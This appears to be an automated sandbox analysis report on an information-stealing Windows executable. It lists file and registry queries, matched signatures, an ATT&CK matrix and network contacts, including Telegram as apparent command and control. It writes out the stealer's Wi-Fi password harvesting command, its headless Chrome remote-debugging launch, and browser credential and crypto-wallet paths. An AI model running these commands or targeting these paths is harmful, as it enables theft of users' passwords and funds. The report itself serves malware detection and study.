                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Users\user\Desktop\bc7EKCf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\bc7EKCf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: bc7EKCf.exe, 00000002.00000002.2000407419.0000000006759000.00000004.00000020.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1974737578.00000000014CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7536, type: MEMORYSTR
                Source: Yara matchFile source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7536, type: MEMORYSTR
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr All
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7536, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7536, type: MEMORYSTR
                Source: Yara matchFile source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7536, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts141
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                Data Encrypted for Impact
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                1
                Extra Window Memory Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                33
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                211
                Process Injection
                1
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Scheduled Task/Job
                1
                Software Packing
                NTDS251
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Process Discovery
                SSHKeylogging3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Extra Window Memory Injection
                Cached Domain Credentials161
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture4
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job161
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586583 Sample: bc7EKCf.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 82 api.telegram.org 2->82 84 icanhazip.com 2->84 86 3 other IPs or domains 2->86 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Malicious sample detected (through community Yara rule) 2->102 106 13 other signatures 2->106 9 bc7EKCf.exe 3 2->9         started        13 msedge.exe 2->13         started        15 msiexec.exe 2->15         started        signatures3 104 Uses the Telegram API (likely for C&C communication) 82->104 process4 file5 64 C:\Users\user\AppData\...\bc7EKCf.exe.log, ASCII 9->64 dropped 114 Attempt to bypass Chrome Application-Bound Encryption 9->114 116 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->116 118 Found many strings related to Crypto-Wallets (likely being stolen) 9->118 122 3 other signatures 9->122 17 bc7EKCf.exe 15 191 9->17         started        66 C:\Users\user\AppData\Local\...\Login Data, SQLite 13->66 dropped 68 C:\Users\user\AppData\Local\...\History, SQLite 13->68 dropped 120 Maps a DLL or memory area into another process 13->120 22 msedge.exe 13->22         started        24 msedge.exe 13->24         started        26 msedge.exe 13->26         started        28 3 other processes 13->28 signatures6 process7 dnsIp8 70 api.telegram.org 149.154.167.220, 443, 49735, 60920 TELEGRAMRU United Kingdom 17->70 72 getwin11.com 80.78.22.111, 60883, 80 CYBERDYNELR Cyprus 17->72 78 2 other IPs or domains 17->78 56 C:\Users\user\AppData\...\XZXHAVGRAG.docx, ASCII 17->56 dropped 58 C:\Users\user\AppData\...\VLZDGUKUTZ.jpg, ASCII 17->58 dropped 60 C:\Users\user\AppData\...\KATAXZVCPS.xlsx, ASCII 17->60 dropped 62 C:\Users\user\AppData\...\ONBQCLYSPU.pdf, ASCII 17->62 dropped 108 Tries to harvest and steal browser information (history, passwords, etc) 17->108 110 Tries to harvest and steal WLAN passwords 17->110 112 Modifies existing user documents (likely ransomware behavior) 17->112 30 chrome.exe 17->30         started        33 cmd.exe 17->33         started        35 msedge.exe 11 17->35         started        37 2 other processes 17->37 74 20.110.205.119, 443, 60904 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->74 76 20.42.65.93, 443, 60891, 60921 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->76 80 16 other IPs or domains 22->80 file9 signatures10 process11 dnsIp12 94 192.168.2.4, 138, 443, 49476 unknown unknown 30->94 96 239.255.255.250 unknown Reserved 30->96 39 chrome.exe 30->39         started        42 conhost.exe 33->42         started        44 chcp.com 33->44         started        46 taskkill.exe 33->46         started        48 timeout.exe 33->48         started        50 msedge.exe 35->50         started        52 conhost.exe 37->52         started     